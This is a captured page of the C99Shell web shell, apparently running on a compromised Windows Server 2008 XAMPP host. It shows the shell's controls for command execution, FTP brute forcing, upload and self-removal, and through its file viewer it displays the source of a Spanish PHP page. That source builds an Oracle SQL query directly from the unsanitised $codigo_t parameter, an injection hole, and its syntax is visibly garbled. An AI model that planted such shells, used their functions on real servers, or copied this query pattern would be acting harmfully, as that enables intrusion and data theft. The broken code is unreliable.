!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\nrc\   drwxrwxrwx
Free 8.81 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     detalleextendido.php (1.73 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Consulta Red Capital</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_callJS(jsStr) { //v2.0
  return eval(jsStr)
}
//-->
</script>
</head>

<body>
<table width="100%" border="0" cellspacing="0" cellpadding="8">
  <tr> 
    <td width="25%">&nbsp;</td>
    <?php
    
// Procedure 8, TRM Detail Extended
    // Selección a partir CODIGO_T de detalle de trámites.
    // Requiere que se pase el NOMBRE_E
    
include('connect.php');
    
$stmt ociparse($c1,"SELECT NORMATIVIDAD, INFORMACIONAPOYO, FECHASRECORDAR FROM TRAMITES where CODIGO=$codigo_t");
    
$result OCIExecute($stmt);
    while (
OCIFetchInto($stmt$cur)) {
        
$normatividad $cur[0];
        
$informacionapoyo$cur[1];
        
$fechasrecordar $cur[2];
    }
    
// TRM Detail Extended End
    
?>
    <td width="50%"><table width="100%" border="0" cellspacing="0" cellpadding="8">
        <tr> 
          <td colspan="3">Menu B&aacute;sico: <a href="#" onMouseOver="MM_callJS('history.go(-1);')">Regresar...</a><a href="detalleextendido.php?codigo_t=<?php echo codigo_t?>"></a></td>
        </tr>
        <tr> 
          <td width="33%">Normas:</td>
          <td colspan="2"> <?php echo $normatividad?></td>
        </tr>
        <tr> 
          <td width="33%">Informaci&oacute;n de Apoyo:</td>
          <td colspan="2"><?php echo $informacionapoyo?> </td>
        </tr>
        <tr> 
          <td width="33%">Fechas para Recordar:</td>
          <td colspan="2"><?php echo $fechasrecordar?> </td>
        </tr>
      </table></td>
    <td width="25%">&nbsp;</td>
  </tr>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--